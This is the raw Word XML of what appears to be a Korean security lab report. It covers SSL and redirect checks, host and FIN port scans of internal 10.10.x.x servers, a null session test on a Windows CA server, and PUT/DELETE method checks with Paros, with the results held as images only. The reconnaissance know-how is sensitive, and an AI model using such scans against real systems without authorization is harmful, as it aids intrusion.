          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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백업</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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일정</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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없음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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웹 서버 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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69820" cy="586740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13" name="그림 13" descr="https://lh5.googleusercontent.com/UCz5heXs74pSstoDy-eeCC5gNcDI5FMo9J8TuqorFjEmFCZGBBCezTf5lhYxjrANm1y-t6qS2mVErkzNGiITl1NC5FglLyW3OYhpd3rK17-RZtgszvf9FVVwF6tHErSqIemLSq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UCz5heXs74pSstoDy-eeCC5gNcDI5FMo9J8TuqorFjEmFCZGBBCezTf5lhYxjrANm1y-t6qS2mVErkzNGiITl1NC5FglLyW3OYhpd3rK17-RZtgszvf9FVVwF6tHErSqIemLSqM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782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38400" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="그림 14" descr="https://lh5.googleusercontent.com/eEA9y8qdxaYrg5ovbWBqNjzJWhraOCGfSYK4pW4bGI1WSyh1g4ehaKEd-O77nZylRPLmqtnx99yT97nG5UtY7lyelT8FUx4I_a0QhPoGGDcHCCtbZqrR83KuAz8J-RChHti7T8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eEA9y8qdxaYrg5ovbWBqNjzJWhraOCGfSYK4pW4bGI1WSyh1g4ehaKEd-O77nZylRPLmqtnx99yT97nG5UtY7lyelT8FUx4I_a0QhPoGGDcHCCtbZqrR83KuAz8J-RChHti7T8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82" w:rsidRPr="00220989" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> https </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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설정</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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>확인</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>및</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http-&gt;https Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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 w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">시스템 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ost Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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07920" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="그림 15" descr="https://lh4.googleusercontent.com/6wr4S9oUms0rhtOjN0gNR5hWUCtCOd2cjKWKtavvN0K1x47JyhRBNRSDLzShddvgVNsenyTI5tB8Xs3k7HHykfbeUVqIJHOChrxbuapojT6AgrjVD5RtC9LLBQUt7xCkw-zWC7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6wr4S9oUms0rhtOjN0gNR5hWUCtCOd2cjKWKtavvN0K1x47JyhRBNRSDLzShddvgVNsenyTI5tB8Xs3k7HHykfbeUVqIJHOChrxbuapojT6AgrjVD5RtC9LLBQUt7xCkw-zWC7yv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3F605BD" wp14:editId="3046F46F">
            <wp:extent cx="2499360" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="그림 16" descr="https://lh4.googleusercontent.com/SiWKJSpNy2KOpvSn7GsIdsb3vPn3zdXz1O9B4c6r8L_dyURdtJ7qfIx33GmJbEo3JRxq_hsxVuNCrnNLBrNSkvkFXufi2hppXxZ4Rj1lc7sv2HdpoajkNJRbZz_fKRb6DoH9bp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SiWKJSpNy2KOpvSn7GsIdsb3vPn3zdXz1O9B4c6r8L_dyURdtJ7qfIx33GmJbEo3JRxq_hsxVuNCrnNLBrNSkvkFXufi2hppXxZ4Rj1lc7sv2HdpoajkNJRbZz_fKRb6DoH9bpd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9" w:rsidRDefault="00220989" w:rsidP="00220989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220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eb, DNS[Primary], DHCP[Primary], DB, Game </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.100.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대역대</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와 DNS[Secondary], DHCP[Secondary], VPN, CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.200.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">대역대의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Scanning </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRDefault="00220989" w:rsidP="00220989">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRPr="00220989" w:rsidRDefault="00220989" w:rsidP="00220989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220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ort Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00220989" w:rsidP="00CE3782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53640" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="17" name="그림 17" descr="https://lh5.googleusercontent.com/Gmrylfdu7XQfB3bW0_4bKUAMei-MOFbhcgBQA_USosI8gTIfweeEBFOWvUWos5HJ_UV9skiFv24TMgldSf8pcZOqSIHBVTLWRLK9yMllpi1J--ujsUKCdbQvtUzbaVRT17EyIh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Gmrylfdu7XQfB3bW0_4bKUAMei-MOFbhcgBQA_USosI8gTIfweeEBFOWvUWos5HJ_UV9skiFv24TMgldSf8pcZOqSIHBVTLWRLK9yMllpi1J--ujsUKCdbQvtUzbaVRT17EyIhj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45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9" w:rsidRDefault="00220989" w:rsidP="00220989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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux, 10.10.100.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 대상으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fin Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 시도했을 때의 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRDefault="00220989" w:rsidP="00220989">
      <w:pPr>
        <w:ind w:left="804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53640" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="18" name="그림 18" descr="https://lh3.googleusercontent.com/qE59ydD5Vt1t1sSDuL7uoFlcxPmkWjtk7k-OgQhXi4pNw1JAICBliMv5LFZH0Y-JjduBPCQe90yOJG_auSlhoxAm8TK59dfoEMuvmPh2NaD9KD5pr4bgTI7tq5gJde5N3SQm_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qE59ydD5Vt1t1sSDuL7uoFlcxPmkWjtk7k-OgQhXi4pNw1JAICBliMv5LFZH0Y-JjduBPCQe90yOJG_auSlhoxAm8TK59dfoEMuvmPh2NaD9KD5pr4bgTI7tq5gJde5N3SQm_DP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DFE596" wp14:editId="7A77A8FF">
            <wp:extent cx="2362200" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="19" name="그림 19" descr="https://lh5.googleusercontent.com/cnlAjUZ11amCchfYQdjUwIUazkvNvRBXA29wPMhOYl2KUfy8cLxngrgYFPUIjyUvKIp2qfaHaFhVEus8S3k6StBRPv7eh-YzM0nB8r9-9R2hIfkRTuaTxJhnzRG_MvNTz7jVi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cnlAjUZ11amCchfYQdjUwIUazkvNvRBXA29wPMhOYl2KUfy8cLxngrgYFPUIjyUvKIp2qfaHaFhVEus8S3k6StBRPv7eh-YzM0nB8r9-9R2hIfkRTuaTxJhnzRG_MvNTz7jViss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89" w:rsidRPr="0010076E" w:rsidRDefault="00220989" w:rsidP="0010076E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PN 서버</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Window 2008 R2, 10.10.200.50</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 대상으로 </w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fin Scanning</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 시도했을 때 방화벽이 있다면 </w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 되지 않고 방화벽이 없다면 열려 있는 P</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ort</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들을 확인할 수 있다는 것을 알 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F510A" w:rsidRDefault="008E3ABE" w:rsidP="008F510A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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE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92680" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20" name="그림 20" descr="https://lh6.googleusercontent.com/EbmPaF_s-MRVuRaDyHTxnvsMBTxENeC_ynmafuRF7i2QPAa6Fc3X-5SpyBZfYxy05IHjAGefojiRPv1wweBNaYzOcdeP5ArZskcQ6H-4T1j6t256Za508KMOj2LbjhaSp3nC_D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EbmPaF_s-MRVuRaDyHTxnvsMBTxENeC_ynmafuRF7i2QPAa6Fc3X-5SpyBZfYxy05IHjAGefojiRPv1wweBNaYzOcdeP5ArZskcQ6H-4T1j6t256Za508KMOj2LbjhaSp3nC_DY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ABE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31720" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="그림 21" descr="https://lh5.googleusercontent.com/xBXmoc4-XkLvobW97MO7Wru8nLAvi3BCKYZrZpTLRixdz70EQ1zu3ZoNPqccGuRc1DI4bnCq6NYhJlpH1vS2pYdErKWVtm35vjQkm1vW01QFBvwIUcIsMNJPfuti9EIicgHMp3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BXmoc4-XkLvobW97MO7Wru8nLAvi3BCKYZrZpTLRixdz70EQ1zu3ZoNPqccGuRc1DI4bnCq6NYhJlpH1vS2pYdErKWVtm35vjQkm1vW01QFBvwIUcIsMNJPfuti9EIicgHMp3u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BE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE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rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indow</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 사용하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에 N</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">은 연결이 되지만 연결된 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null Session</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로는 서버의 접근할 수 없음</w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">아래 링크에서 확인 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://social.technet.microsoft.com/Forums/windowsserver/en-US/841523db-8c4b-43a0-9f28-be7270f92e2b/disable-server-2008-null-sessions?forum=winservergen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="004A79E9" w:rsidP="0040771B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 w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9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4A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UT, Delete </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ethod </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="0010076E" w:rsidP="004A79E9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23160" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130" name="그림 130" descr="https://lh4.googleusercontent.com/fIFYRpjz5PVvUyW-kGFDYhUF51MTb9NGXRuGAr_j2JOV1lT97m_8bXtOpVYbr0lmJfjHvG6ReD72Y0rlUkpuLMzAbBJmAI8l8F46DsBuESOTJKsiJmsJBkGiTcpYiiLIGVEbJD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4.googleusercontent.com/fIFYRpjz5PVvUyW-kGFDYhUF51MTb9NGXRuGAr_j2JOV1lT97m_8bXtOpVYbr0lmJfjHvG6ReD72Y0rlUkpuLMzAbBJmAI8l8F46DsBuESOTJKsiJmsJBkGiTcpYiiLIGVEbJDXz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76E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148840" cy="335280"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="131" name="그림 131" descr="https://lh3.googleusercontent.com/OYPt-xyQrcKoQO3o4cH6yAzkhGshYTo4pY2hsbqrXrCy4dwTdxOMj61TwDt7d2a8E1zfOUSFvKdqwvDlq5JsowPtf6iL-APzvw7vh-XNI7nXhS7vVvKLVZ2HTdXCxTfkXAqXm6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3.googleusercontent.com/OYPt-xyQrcKoQO3o4cH6yAzkhGshYTo4pY2hsbqrXrCy4dwTdxOMj61TwDt7d2a8E1zfOUSFvKdqwvDlq5JsowPtf6iL-APzvw7vh-XNI7nXhS7vVvKLVZ2HTdXCxTfkXAqXm6m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6E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E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10076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>메인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페이지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접속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후</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Paros</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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통해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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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확인하면</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전이</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인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것을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확인할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수</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="0010076E" w:rsidP="004A79E9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07920" cy="234205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
